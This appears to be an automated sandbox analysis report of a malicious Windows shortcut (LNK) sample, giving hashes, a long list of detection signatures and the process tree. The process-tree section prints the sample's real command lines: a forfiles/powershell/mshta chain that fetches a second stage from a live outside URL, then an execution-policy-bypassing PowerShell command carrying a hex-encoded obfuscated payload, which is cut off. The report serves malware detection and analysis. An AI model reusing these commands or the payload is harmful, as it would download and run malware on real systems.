Edit tour
Windows
Analysis Report
R4qP4YM0QX.lnk
Overview
General Information
Sample name: | R4qP4YM0QX.lnkrenamed because original name is a hash value |
Original sample name: | c994e4260593f7a34502021234dae6a9.lnk |
Analysis ID: | 1577882 |
MD5: | c994e4260593f7a34502021234dae6a9 |
SHA1: | 79ce5393d4fa09d39588aca57653b65e46bceb3b |
SHA256: | f87591ca3e590371796ced4bd9df58da5dc7822faae2520886470d1307b69db9 |
Tags: | lnkuser-abuse_ch |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- forfiles.exe (PID: 5336 cmdline:
"C:\Window s\System32 \forfiles. exe" /p C: \Windows\S ystem32 /m cmmon32.e xe /c "pow ershell . \*i*\*2\ms h*e https: //tiffany- careers.co m/FILEANH MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E) - conhost.exe (PID: 6940 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 612 cmdline:
. \*i*\*2\ msh*e http s://tiffan y-careers. com/FILEAN H MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 1476 cmdline:
"C:\Window s\System32 \mshta.exe " https:// tiffany-ca reers.com/ FILEANH MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 612 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction clea n ($pzaMyJ g){return -split ($p zaMyJg -re place '..' , '0x$& ') };$KUtXL = clean('78 219AD4FAFD 1313B3312A BC82CE34A0 2A4A60C02E BEBF66EF22 D1AE9E38EA B935975C5E 265945ACF8 F43EA3217D 7E04446B93 E8935F8A65 0373163DF2 3D9095D2EE 36D9AE1838 30DA3383A9 3777009FFE 992C943654 31E85C9A4B D19706DE0F 651039764F 10D911FF62 FC644C72D4 568DEB2227 6F734D73AB 4E6A18097D C3C4C7480C FE127D41CB 49FF2295F7 E03078C98E 7DBADDD24D D3982D0786 BCE84A3871 92B080A130 BF4762AFEF C2CE03F92D 6FBB6AEA0B 223A2119AB FE11214C69 8E82BE06E8 F9B342CD1C 7F08905067 5451B7455B 935BA44320 6FDCD04C4D 942F462068 7D61DCE7B4 896DF4982A D1CAA47099 13A3BFBA78 68829327FE 80430B6CFF 032AFE6E14 4EA3B7EEEB 9B1ED8A7D2 EE845D2641 0B8D045FB1 A5B3BF8A7A B9BB3E0D06 6452978BBC 7F12583560 0824DDDC81 D38A5209F1 A4091DD7B7 C1D04307CA 0FB5F05575 A79F927FE5 1C241234BD 04F8991807 0EE2E5287B E446F1920B F8A252AD89 98C544A249 048AF75DB8 9D6D0B6A8A D543DEEB08 89D275BCB8 B92841DAD4 290E2DC88D 65C9630CC4 7CCD6F299B B0BED9C404 CBD5A82ADE 61B6393BD1 C517406CEC 6BBF66E379 EEFE6CAB17 ABC4FE3B95 CD7AFF7FC1 DDD9A920A6 191FB37C8E C30A4A7667 A113B67867 2013F0BABB 0C4B9F43C8 7FC854B2E4 7772CACC37 D2ADF26648 24AF9C4DB9 47633D07DD 47E03C0BD6 86B11FD76A BC45F1D405 0F3E57080C 852D506F56 B49340243D 2E73DD50FA 076F63A84B C99C7519AD C821AC6311 B2CEDD5950 8884AE75F5 3F4A78FF89 CC03F89965 1C73F3989A 11092A199B D1AA8DCCA2 7B2B7D39A6 A8A8A1E91E 34A2619677 5ACBEADB10 6D5F827D0A 5A5B44D891 E4B333CA7F 6AFDC7725D 5BD9CEC0B1 1138E8AB3A FBEEE6D44F 83D151C14A 67A3497E17 312DF7AB7B D3DCB1D33A C9AA0402ED 89756C4B88 1508E863BE 482E8AEFB8 06649D738E 7DCE281488 8C8EE1E5F0 C849829B3A 00AA1A7EF6 E1C6498222 EC93BF8FED 737DE9D757 6AFAE85485 0BFF492E80 199552DDEF 0675B892B3 27717CB5AF 4CFFBB1A5D 7C623A2768 AA32CC72FB CA150EC078 6993E294FA 0F154E9A90 E9394DC84E 513BB54ED6 3CDE8CDDBD AE0AC392E9 3E0A5AF01C FE86C53D9F 595CED5153 2CB14F4D98 D7FCD5EF8B 286785CABB 97B5793CDF DC9D05F903 53B05939CA C7A6F8938A 1073C7190E D1E372A484 F1764DEAAC 0CB173B868 C0330983DC ADEB563002 EE18FDD066 2F11173817 39EC36C7AC 7F333B3D0F 9883A3875F 9AD6194D62 64748161A5 E8FC943C8D 9CC7F4F4CC 6DFFC926B8 CB32A52C8C E0BBCD0CC4 E6128DEFB5 ECED7F3A97 86CB2F36C6 B53B84C319 FA011D47CD 55D4FC3A8B FD9BBD84A9 736B112231 4172FB69B3 08F5380A65 BD8E70E37A 3C3660FAB1 6D1CA3609E D74F25793C B21D2C45B0 81D8E2F72D CDDBE26918 8B42541A2D 5FE30CBDAE 1EA3E31418 FACA2F5448 EECBFD69D9 231F9C19AB C5BE36A877 6A1319460E E488396DDC 19905B1F4A 80C52596B8 5B2B0BFA14 FED4C0AEC8 366A87710B 144BAA0ECA 013BF68B76 4FD59CF871 FAE15AFAFE 6A3E29CF3B EDEFDDF296 75BB14D585 BB959E8603 4C7525C357 2536DCCFC1